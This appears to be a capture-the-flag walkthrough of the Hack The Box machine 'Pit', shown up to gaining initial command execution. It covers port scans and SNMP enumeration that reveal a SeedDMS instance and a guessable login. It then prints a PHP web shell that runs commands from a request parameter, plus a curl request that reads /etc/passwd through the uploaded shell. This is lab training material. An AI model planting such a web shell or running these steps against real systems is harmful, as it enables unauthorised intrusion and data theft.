Pit

Completed on September 21, 2021

Overview

Pit is a Linux based HTB machine that in some ways relies on the typical, and that is relying on SSH and HTTP to get into the system. The twist on it is the use of another service which quite frankly I had barely relied until now. It just emphasizes that you should never stop learning.

As a spoiler, the name of this box related to Cockpit. I would Google that if I were you!

Resources:

Initial Enumeration: Footprinting and Scanning

As we need to know exactly what we are dealing with in terms of services available, we first run nmap, but in a way at first that will give us only the open ports.

NMAP

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> nmap -p- --min-rate=1000 -T4 pit.htb -oN Pit_OpenPort.log -oX Pit_OpenPorts.xml
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 23:41 EDT
Nmap scan report for pit.htb (10.129.219.56)
Host is up (0.039s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin
 
Nmap done: 1 IP address (1 host up) scanned in 122.64 seconds

As mentioned in the overview, we have SSH and HTTP accessible, but we also have TCP 9090. To make it easier on ourselves, we can create a variable from what the 'open port' log file contains.

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> PORTS=$(cat Pit_OpenPort.log | grep tcp | cut -d "/" -f1 | xargs | tr " " ",")

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> nmap -sC -sV pit.htb -p $PORTS -oN Pit_PortScan.log -oX Pit_PortScan.xml
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-18 23:47 EDT
Nmap scan report for pit.htb (10.129.219.56)
Host is up (0.039s latency).
 
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
| vulners: 
|   cpe:/a:openbsd:openssh:8.0: 
|       CVE-2020-15778  6.8 https://vulners.com/cve/CVE-2020-15778
|       CVE-2019-16905  4.4 https://vulners.com/cve/CVE-2019-16905
|       MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/ 4.3 https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/  *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/  4.3 https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/   *EXPLOIT*
|       MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/   4.3 https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/    *EXPLOIT*
|_      CVE-2020-14145  4.3 https://vulners.com/cve/CVE-2020-14145
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
| vulners: 
|   cpe:/a:igor_sysoev:nginx:1.14.1: 
|       CVE-2019-9513   7.8 https://vulners.com/cve/CVE-2019-9513
|       CVE-2019-9511   7.8 https://vulners.com/cve/CVE-2019-9511
|       CVE-2021-23017  7.5 https://vulners.com/cve/CVE-2021-23017
|       1337DAY-ID-36300    7.5 https://vulners.com/zdt/1337DAY-ID-36300    *EXPLOIT*
|       CVE-2019-9516   6.8 https://vulners.com/cve/CVE-2019-9516                  
|       CVE-2018-16845  5.8 https://vulners.com/cve/CVE-2018-16845
|_      PACKETSTORM:162830  0.0 https://vulners.com/packetstorm/PACKETSTORM:162830  *EXPLOIT*
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.22 seconds

When we browse to http://pit.htb we get what looks to be a default nginx page running on version 1.14.1 and running on Redhat! The NGinx information was first provided by nmap.

CURL

When we go to http://pit.htb:9090, not only we get redirected to an https site, but we also find a CentOS related login page. From what nmap gave us, you can see the service is http-related but also shows a bad request followed by the use of SSL. If we want to confirm the redirection to https:

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vk -I http://pit.htb:9090 2>&1 
*   Trying 10.129.95.189:9090...
* Connected to pit.htb (10.129.95.189) port 9090 (#0)
> HEAD / HTTP/1.1
> Host: pit.htb:9090
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
< Content-Type: text/html
Content-Type: text/html
< Location: https://pit.htb:9090/
Location: https://pit.htb:9090/
< Content-Length: 73
Content-Length: 73
< X-DNS-Prefetch-Control: off
X-DNS-Prefetch-Control: off
< Referrer-Policy: no-referrer
Referrer-Policy: no-referrer
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
 
< 
* Excess found: excess = 73 url = / (zero-length body)
* Connection #0 to host pit.htb left intact

Let's retrieve the certificate content by using curl:

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -I https://pit.htb:9090 2>&1
*   Trying 10.129.95.189:9090...
* Connected to pit.htb (10.129.95.189) port 9090 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; CN=dms-pit.htb
*  start date: Apr 16 23:29:12 2020 GMT
*  expire date: Jun  4 16:09:12 2030 GMT
*  issuer: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; OU=ca-5763051739999573755; CN=dms-pit.htb
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> HEAD / HTTP/1.1
> Host: pit.htb:9090
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type: text/html
Content-Type: text/html
< Content-Security-Policy: connect-src 'self' https://pit.htb:9090 wss://pit.htb:9090; form-action 'self' https://pit.htb:9090; base-uri 'self' https://pit.htb:9090; object-src 'none'; font-src 'self' https://pit.htb:9090 data:; img-src 'self' https://pit.htb:9090 data:; block-all-mixed-content; default-src 'self' https://pit.htb:9090 'unsafe-inline'
Content-Security-Policy: connect-src 'self' https://pit.htb:9090 wss://pit.htb:9090; form-action 'self' https://pit.htb:9090; base-uri 'self' https://pit.htb:9090; object-src 'none'; font-src 'self' https://pit.htb:9090 data:; img-src 'self' https://pit.htb:9090 data:; block-all-mixed-content; default-src 'self' https://pit.htb:9090 'unsafe-inline'
< Set-Cookie: cockpit=deleted; PATH=/; Secure; HttpOnly
Set-Cookie: cockpit=deleted; PATH=/; Secure; HttpOnly
< Transfer-Encoding: chunked
Transfer-Encoding: chunked
< Cache-Control: no-cache, no-store
Cache-Control: no-cache, no-store
< X-DNS-Prefetch-Control: off
X-DNS-Prefetch-Control: off
< Referrer-Policy: no-referrer
Referrer-Policy: no-referrer
< X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
< Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
 
< 
* Excess found: excess = 5 url = / (zero-length body)
* Connection #0 to host pit.htb left intact

We see there is another site listed as the CN of this site, something we saw from nmap:

* Server certificate:
*  subject: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; CN=dms-pit.htb
*  start date: Apr 16 23:29:12 2020 GMT
*  expire date: Jun  4 16:09:12 2030 GMT
*  issuer: C=US; O=4cd9329523184b0ea52ba0d20a1a6f92; OU=ca-5763051739999573755; CN=dms-pit.htb

Let's add this to our hosts file and retest against both TCP 80 and 9090.

Example:

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> cat /etc/hosts | grep -i pit          
10.129.220.187   pit.htb dms-pit.htb

TCP 9090 sent us to the same page, BUT TCP 80 gave us a 403 error. Let's see what we can find there:

DIRB

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> dirb http://dms-pit.htb/ /opt/seclists/Discovery/Web-Content/common.txt -t -l -N 401,403,404 -f -w -o Pit_dirb.txt -p http://127.0.0.1:8080
 
-----------------
DIRB v2.22
By The Dark Raver
-----------------
 
OUTPUT_FILE: Pit_dirb.txt
START_TIME: Sun Sep 19 11:34:15 2021
URL_BASE: http://dms-pit.htb/
WORDLIST_FILES: /opt/seclists/Discovery/Web-Content/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Ignoring NOT_FOUND code -> 401
PROXY: http://127.0.0.1:8080
OPTION: NOT forcing an ending '/' on URLs
OPTION: Not Stopping on warning messages
 
-----------------
 
GENERATED WORDS: 4696                                                          
 
---- Scanning URL: http://dms-pit.htb/ ----
+ http://dms-pit.htb/WS_FTP.LOG (CODE:403|SIZE:571)                               
+ http://dms-pit.htb/akeeba.backend.log (CODE:403|SIZE:571)                       
+ http://dms-pit.htb/crossdomain.xml (CODE:403|SIZE:571)                          
+ http://dms-pit.htb/development.log (CODE:403|SIZE:571)                          
+ http://dms-pit.htb/production.log (CODE:403|SIZE:571)                           
+ http://dms-pit.htb/sitemap.xml (CODE:403|SIZE:571)                              
+ http://dms-pit.htb/spamlog.log (CODE:403|SIZE:571)                              
+ http://dms-pit.htb/web.xml (CODE:403|SIZE:571)                                  
                                                                                  
-----------------
END_TIME: Sun Sep 19 11:44:07 2021
DOWNLOADED: 4696 - FOUND: 8

So we get nowhere. Every attempt gives us a 403. Given NGinx 1.14.1 has some vulnerabilities and one relates it to UDP DNS traffic, let's try and find any UDP ports this host might be listening to. For this, we will use masscan against all ports (both TCP and UDP) to get something quick.

MASSCAN

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> sudo masscan -e tun1 -p1-65535,U:1-65535 10.129.95.189 --rate=1000 | tee Pit_masscan.log
[sudo] password for htb: 
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-09-19 16:00:01 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.129.95.189                                   
Discovered open port 9090/tcp on 10.129.95.189                                 
Discovered open port 161/udp on 10.129.95.189                                  
Discovered open port 80/tcp on 10.129.95.189

The above does not confirm out hunch from the NGinx 1.14.1 vulnerability and UDP DNS, but we did uncover SNMP is accessible.

SNMP-CHECK

Let's now use snmp-check against UDP 161 (snmp).

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> snmp-check 10.129.95.189
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
 
[+] Try to connect to 10.129.95.189:161 using SNMPv1 and community 'public'
 
[*] System information:
 
  Host IP address               : 10.129.95.189
  Hostname                      : pit.htb
  Description                   : Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
  Contact                       : Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
  Location                      : Unknown (edit /etc/snmp/snmpd.conf)
  Uptime snmp                   : 00:47:31.51
  Uptime system                 : 00:47:00.48
  System date                   : -
 
[*] Processes:
 
  Id                    Status                Name                  Path                  Parameters          
  1                     runnable              systemd               /usr/lib/systemd/systemd  --switched-root --system --deserialize 17
  ...
  822                   runnable              systemd-journal       /usr/lib/systemd/systemd-journald                      
  857                   runnable              systemd-udevd         /usr/lib/systemd/systemd-udevd                      
  914                   unknown               kdmflush                                                        
  918                   unknown               nfit                                                            
  932                   unknown               xfs-buf/dm-2                                                    
  933                   unknown               xfs-conv/dm-2                                                   
  934                   unknown               xfs-cil/dm-2                                                    
  935                   unknown               xfs-reclaim/dm-                                                 
  936                   unknown               xfs-eofblocks/d                                                 
  937                   unknown               xfs-log/dm-2                                                    
  938                   runnable              xfsaild/dm-2                                                    
  943                   runnable              jbd2/sda1-8                                                     
  944                   unknown               ext4-rsv-conver                                                 
  967                   runnable              auditd                /sbin/auditd                              
  969                   runnable              sedispatch            /usr/sbin/sedispatch                      
  1000                  runnable              VGAuthService         /usr/bin/VGAuthService  -s                  
  1002                  runnable              vmtoolsd              /usr/bin/vmtoolsd                         
  1003                  runnable              dbus-daemon           /usr/bin/dbus-daemon  --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  1005                  runnable              irqbalance            /usr/sbin/irqbalance  --foreground        
  1006                  runnable              sssd                  /usr/sbin/sssd        -i --logger=files   
  1009                  runnable              polkitd               /usr/lib/polkit-1/polkitd  --no-debug          
  1013                  runnable              chronyd               /usr/sbin/chronyd                         
  1021                  runnable              rngd                  /sbin/rngd            -f --fill-watermark=0
  1042                  runnable              sssd_be               /usr/libexec/sssd/sssd_be  --domain implicit_files --uid 0 --gid 0 --logger=files
  1051                  runnable              sssd_nss              /usr/libexec/sssd/sssd_nss  --uid 0 --gid 0 --logger=files
  1052                  runnable              firewalld             /usr/libexec/platform-python  -s /usr/sbin/firewalld --nofork --nopid
  1080                  runnable              systemd-logind        /usr/lib/systemd/systemd-logind                      
  1091                  runnable              NetworkManager        /usr/sbin/NetworkManager  --no-daemon         
  1097                  runnable              tuned                 /usr/libexec/platform-python  -Es /usr/sbin/tuned -l -P
  1098                  runnable              sshd                  /usr/sbin/sshd        -D -oCiphers=aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128
  1143                  runnable              crond                 /usr/sbin/crond       -n                  
  1167                  runnable              nginx                 nginx: master process /usr/sbin/nginx                      
  1168                  runnable              nginx                 nginx: worker process                      
  1169                  runnable              nginx                 nginx: worker process                      
  1180                  runnable              agetty                /sbin/agetty          -o -p -- \u --noclear tty1 linux
  1201                  runnable              mysqld                /usr/libexec/mysqld   --basedir=/usr      
  1468                  running               snmpd                 /usr/sbin/snmpd       -LS0-6d -f          
  1470                  runnable              rsyslogd              /usr/sbin/rsyslogd    -n                  
  1713                  unknown               kworker/1:0-cgroup_destroy                                            
  1754                  unknown               kworker/u4:0-xfs-cil/dm-0                                            
  1870                  unknown               kworker/1:5-events                                              
  1983                  unknown               kworker/u4:1-events_unbound                                            
  2043                  unknown               kworker/0:0-cgroup_destroy                                            
  2170                  unknown               kworker/1:1-events                                              
  2173                  unknown               kworker/0:1-cgroup_pidlist_destroy                                            
  2194                  unknown               kworker/0:3-events_power_efficient                                            
  2233                  runnable              anacron               /usr/sbin/anacron     -s                  
  2245                  unknown               kworker/1:2-cgroup_pidlist_destroy                                            
  2269                  runnable              php-fpm               php-fpm: master process (/etc/php-fpm.conf)                      
  2270                  runnable              php-fpm               php-fpm: pool www                         
  2271                  runnable              php-fpm               php-fpm: pool www                         
  2272                  runnable              php-fpm               php-fpm: pool www                         
  2273                  runnable              php-fpm               php-fpm: pool www                         
  2274                  runnable              php-fpm               php-fpm: pool www                         
  2277                  unknown               kworker/u4:2-events_unbound                                            
  2281                  unknown               kworker/1:3-events

Even though the process list was truncated, it gave us some good information on what is going on in this box.

While doing some searches on how to pull more data from snmp, we come up with these perl scripts which gave us more information (https://github.com/dheiland-r7/snmp). The following allow us to do a bulk walk on snmp.

SNMPBW

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> /opt/snmp/snmpbw.pl pit.htb public 2 1      
SNMP query:       10.129.95.189
Queue count:      0
SNMP SUCCESS:     10.129.95.189

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> #It's output!

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> grep var 10.129.95.189.snmp
.1.3.6.1.4.1.2021.9.1.2.2 = STRING: "/var/www/html/seeddms51x/seeddms"
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.31 = No more variables left in this MIB View (It is past the end of the MIB tree)

This gives a lead. If we test this against the domains we know, only http://dms-pit.htb responds and redirect us to a login page.

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -I http://dms-pit.htb/seeddms51x/seeddms
*   Trying 10.129.95.189:80...
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
HTTP/1.1 301 Moved Permanently
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html
Content-Type: text/html
< Content-Length: 185
Content-Length: 185
< Location: http://dms-pit.htb/seeddms51x/seeddms/
Location: http://dms-pit.htb/seeddms51x/seeddms/
< Connection: keep-alive
Connection: keep-alive
 
< 
* Connection #0 to host dms-pit.htb left intact
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/'
* Found bundle for host dms-pit.htb: 0x55a04a122b60 [serially]
* Can not multiplex, even if we wanted to!
* Re-using existing connection! (#0) with host dms-pit.htb
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms/ HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
HTTP/1.1 302 Found
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Connection: keep-alive
Connection: keep-alive
< X-Powered-By: PHP/7.2.24
X-Powered-By: PHP/7.2.24
< Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F
Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F
 
< 
* Connection #0 to host dms-pit.htb left intact
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F'
* Found bundle for host dms-pit.htb: 0x55a04a122b60 [serially]
* Can not multiplex, even if we wanted to!
* Re-using existing connection! (#0) with host dms-pit.htb
* Connected to dms-pit.htb (10.129.95.189) port 80 (#0)
> HEAD /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2F HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: nginx/1.14.1
Server: nginx/1.14.1
< Date: Sun, 19 Sep 2021 17:27:50 GMT
Date: Sun, 19 Sep 2021 17:27:50 GMT
< Content-Type: text/html; charset=UTF-8
Content-Type: text/html; charset=UTF-8
< Connection: keep-alive
Connection: keep-alive
< X-Powered-By: PHP/7.2.24
X-Powered-By: PHP/7.2.24
< X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
< X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
 
< 
* Connection #0 to host dms-pit.htb left intact

And we seem to be hitting the login page of Seeddms, an open-source document management system.

Since we have no credentials, we go back to the SNMP dump and we only find the user 'michelle', but no password.

"Memory usage
              total        used        free      shared  buff/cache   available
Mem:          3.8Gi       328Mi       3.2Gi       8.0Mi       276Mi       3.3Gi
Swap:         1.9Gi          0B       1.9Gi
Database status
OK - Connection to database successful.
System release info
CentOS Linux release 8.3.2011
SELinux Settings
user
 
                Labeling   MLS/       MLS/                          
SELinux User    Prefix     MCS Level  MCS Range                      SELinux Roles
 
guest_u         user       s0         s0                             guest_r
root            user       s0         s0-s0:c0.c1023                 staff_r sysadm
_r system_r unconfined_r
staff_u         user       s0         s0-s0:c0.c1023                 staff_r sysadm
_r unconfined_r
sysadm_u        user       s0         s0-s0:c0.c1023                 sysadm_r
system_u        user       s0         s0-s0:c0.c1023                 system_r uncon
fined_r
unconfined_u    user       s0         s0-s0:c0.c1023                 system_r uncon
fined_r
user_u          user       s0         s0                             user_r
xguest_u        user       s0         s0                             xguest_r
login
 
Login Name           SELinux User         MLS/MCS Range        Service
 
__default__          unconfined_u         s0-s0:c0.c1023       *
michelle             user_u               s0                   *
root                 unconfined_u         s0-s0:c0.c1023       *
System uptime
 13:21:30 up  2:03,  0 users,  load average: 0.00, 0.00, 0.00"

We can try to access it by using michelle:michelle to start. Let's try to login and see what happens:

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -vkL -X POST http://dms-pit.htb/seeddms51x/seeddms/op/op.Login.php \
-H "Content-Type: application/x-www-form-urlencoded" \
--proxy http://127.0.0.1:8080 \
> --data "login=michelle&pwd=michelle&lang=en_GB"
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST http://dms-pit.htb/seeddms51x/seeddms/op/op.Login.php HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 38
> 
* upload completely sent off: 38 out of 38 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:29 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< Set-Cookie: mydms_session=0f66afe88c0e0fe171df8797c83dd346; path=/seeddms51x/seeddms/; HttpOnly
< Location: /seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1
< Content-Length: 0
< 
* Closing connection 0
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1'
* Switch from POST to GET
* Hostname 127.0.0.1 was found in DNS cache
*   Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#1)
> POST http://dms-pit.htb/seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1 HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:39 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< Location: /seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1
< Content-Length: 0
< 
* Closing connection 1
* Issue another request to this URL: 'http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1'
* Hostname 127.0.0.1 was found in DNS cache
*   Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#2)
> POST http://dms-pit.htb/seeddms51x/seeddms/out/out.Login.php?referuri=%2Fseeddms51x%2Fseeddms%2Fout%2Fout.ViewFolder.php%3Ffolderid%3D1 HTTP/1.1
> Host: dms-pit.htb
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.14.1
< Date: Mon, 20 Sep 2021 01:27:50 GMT
< Content-Type: text/html; charset=UTF-8
< Connection: close
< X-Powered-By: PHP/7.2.24
< X-WebKit-CSP: script-src 'self' 'unsafe-eval'; worker-src blob:;
< X-Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Security-Policy: script-src 'self' 'unsafe-eval'; worker-src blob:;
< Content-Length: 7449
< 
<!DOCTYPE html>
<html>
...
</html>
* Closing connection 2

And looks like we can get in (yes, I truncated the HTML code as we can't do anything with it at the moment).

Exploitation and Gaining Access

With valid credentials, we can now attempt to to use the authenticated RCE exploit available (https://www.exploit-db.com/exploits/47022).

We have to upload a document with a backdoor or a reverse shell. For this, we got to find a place to upload and looks like each user has its own folder.

Example of a "backdoor" to upload:

<?php
 
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
 
?>

After many attempts we get to find out php reverse shells do not work well here.

This is why we end up using the PHP exploit in the example above to do some command injection. Once we upload, we should be able to access the page and send our OS command by using http://<host>/data/1048576/<doc_id>/<filename>.php?cmd=<command>.

┌─[htb 👿 back0ff]─[~/…/Pit]
└─[$]─> curl -isk -X GET \
--url 'http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id;cat+/etc/passwd' \
    -H 'Host: dms-pit.htb' \
    -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' \
    -H 'Accept-Language: en-US,en;q=0.5' \
    -H 'Accept-Encoding: gzip, deflate' \
    -H 'X-Requested-With: XMLHttpRequest' \
    -b 'mydms_session=7099c4b735b5e2c8ea474bbf0720f90c' --proxy 'http://127.0.0.1:8080'
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Mon, 20 Sep 2021 04:17:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.24
Content-Length: 1601
 
<pre>uid=992(nginx) gid=988(nginx) groups=988(nginx) context=system_u:system_r:httpd_t:s0
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sssd:x:996:992:User for sssd:/:/sbin/nologin
chrony:x:995:991::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
michelle:x:1000:1000::/home/michelle:/bin/bash
setroubleshoot:x:994:990::/var/lib/setroubleshoot:/sbin/nologin
cockpit-ws:x:993:989:User for cockpit-ws:/nonexisting:/sbin/nologin
